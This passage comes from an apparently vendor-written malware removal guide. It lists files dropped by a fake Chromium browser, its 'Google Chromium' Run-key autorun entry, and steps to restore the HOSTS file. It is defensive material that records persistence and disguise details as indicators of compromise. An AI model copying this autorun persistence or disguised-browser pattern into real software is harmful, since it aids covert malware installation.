   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\libpeerconnection.dll (56491 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\pepflashplayer.dll (277843 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.pak (4074 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\chrome.exe (30992 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\icudt.dll (455362 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.pak (250 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.pak (250 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.pak (5049 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.pak (1274 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome_100_percent.pak (6625 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.pak (2249 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome.dll (794832 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\resources.pak (40311 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.pak (4074 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.pak (3461 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.pak (3257 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.dll (10 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "Google Chromium" = "%Documents and Settings%\%current user%\Application Data\Chromium.exe"

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.